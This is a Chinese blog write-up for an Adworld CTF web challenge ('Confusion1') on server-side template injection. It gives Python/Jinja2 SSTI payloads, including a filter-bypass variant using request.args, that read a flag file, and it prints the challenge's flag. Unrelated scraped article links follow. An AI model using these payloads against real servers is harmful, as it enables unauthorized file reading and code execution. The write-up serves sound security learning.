【愚公系列】2023年05月 攻防世界-Web(Confusion1)
文章目录
- 前言
- 一、Confusion1
- 1.题目
- 2.答题
前言
SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞,它允许攻击者通过在模板中注入恶意代码,执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成,这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码,从而实现任意代码执行,甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞,因为攻击者可以完全控制服务器端执行的代码和结果。
一、Confusion1
1.题目
2.答题
login.php中Ctrl+U查看页面源码发现flag路径
login.php{{1+3}}测试ssti漏洞
SSTI常用的注入
__class__() 返回对象的类
__base__()/__mro__() 返回类所继承的基类
__subclasses__() 返回继承类的所有子类
测试pyaload:
{{"".__class__.__mro__[2].__subclasses__()[40]("/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt").read()}}
发现被过滤了
参数替换payload:
{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?&a=__class__&b=__mro__&c=__subclasses__&d=read
得到flag:cyberpeace{8542f410d961a14be7aa7778e0f366a4}
【愚公系列】2023年05月 攻防世界-Web(Confusion1)相关推荐
- 【愚公系列】2023年05月 攻防世界-Web(lottery)
文章目录 前言 一.lottery 1.题目 2.答题 前言 dirsearch是一个用于Web服务器的爬虫工具,它可以快速地扫描网站的目录,并找出隐藏的文件和目录.dirsearch可以检测出许多常 ...
- 【愚公系列】2023年05月 攻防世界-Web(unseping)
文章目录 前言 一.unseping 1.题目 2.答题 前言 反序列化漏洞是一种安全漏洞,存在于那些使用序列化技术的应用程序中.反序列化是将已序列化数据还原回对象的过程.攻击者可以通过构造恶意序列化 ...
- 【愚公系列】2023年05月 攻防世界-Web(shrine)
文章目录 前言 一.shrine 1.题目 2.答题 前言 Flask是一个轻量级的Web应用程序框架,用于Python编程语言.它是基于Werkzeug WSGI工具箱和Jinja2模板引擎构建的. ...
- 【愚公系列】2023年05月 攻防世界-Web(FlatScience)
文章目录 前言 一.FlatScience 1.题目 2.答题 前言 Robots协议,也称作robots.txt,是一种在Web站点中告诉搜索引擎蜘蛛哪些页面可以被访问的协议.该协议规定了机器人在访 ...
- 【愚公系列】2023年05月 攻防世界-Web(file_include)
文章目录 前言 1.文件包含漏洞 2.php伪协议 3.php包含漏洞函数 一.file_include 1.题目 2.答题 总结 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion ...
- 【愚公系列】2023年05月 攻防世界-Web(Web_php_include)
文章目录 前言 1.文件包含漏洞 2.php伪协议 3.php包含漏洞函数 一.Web_php_include 1.题目 2.答题 2.1 伪协议解题 2.2 中国蚁剑 2.3 数据库写入 前言 1. ...
- 【愚公系列】2023年05月 攻防世界-Web(fileclude)
文章目录 前言 1.文件包含漏洞 2.php伪协议 一.fileclude 1.题目 2.答题 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion Vulnerability)是一种常 ...
- 【愚公系列】2023年05月 攻防世界-Web(fileinclude)
文章目录 前言 1.文件包含漏洞 2.php伪协议 一.fileinclude 1.题目 2.答题 前言 1.文件包含漏洞 文件包含漏洞(File Inclusion Vulnerability)是一 ...
- 【愚公系列】2023年05月 攻防世界-Web(Web_php_unserialize)
文章目录 前言 一.Web_php_unserialize 1.题目 2.答题 前言 PHP的序列化漏洞是一种安全漏洞,攻击者可以利用这种漏洞来执行恶意代码或获取敏感信息.具体来说,攻击者可以通过在序 ...
最新文章
- python launcher怎么使用_QMUI实战(一)—为何我们要使用 LauncherActivity?
- 单链表-在带头结点的单链表L中删除一个最小值结点(四指针)
- python统计文件行数检测字符串_python统计文件中的字符串数目示例
- 浙江 徐崇峰 胜 杭州 郭凤达 2018年第五届“高港杯”象棋青年大师赛男子组
- mysql性能优化金字塔法则pdf_MySQL索引优化2-优化法则
- linux 文件按照大小排列
- Win7系统win键没有反应的应对措施
- c++ 全局变量_专业解码 | 带你了解Python全局变量与局部变量!
- opencv 调整图像亮度和对比度
- 技嘉linux支持的主板型号,详细解读主板厂商命名规则——技嘉篇
- 初学者-C语言基础练习(二)——C语言编译器的使用方法
- php开发工具ps,小蚂蚁学习PS切图之基础操作(2)——工具栏的介绍
- JDK8中String的intern()方法详细解读【内存图解+多种例子+1.1w字长文】
- 关于 mPaaS PB 接入模式适配 64 位 CPU 架构中项目报错解决方案
- 关于机械键盘的一些知识
- 根据身份证号码计算生日/年龄/性别
- 基本的计算机理论知识试题及答案,计算机的基础知识试题及答案
- Codeforces Round #775 (Div. 2) E.Tyler and Strings
- php模拟登录教学视频,php使用curl模拟登录人人(校内)网_PHP教程
- 金山网络-度过生死线
热门文章
- linux系统查看当前安装字库,Linux系统下安装和配置中文字库的方法
- 英国普利茅斯大学:量子计算机与脑机接口的“相生相克”
- php获取全国最新省市区行政区划数据
- 树的度、叶子节点相关计算问题
- 冒险岛登录服务器未响应,打开冒险岛,登陆角色后就黑屏了
- 2022胺基化工艺考试试题及答案
- (二)Linux嵌入式开发——软件安装(Ubuntu)
- STM32 固件库,CMSIS 标准,STM32Cube
- savefiles提供免费25G网盘,可外链图片、视频
- 一款基于ssd1306驱动的12864屏简介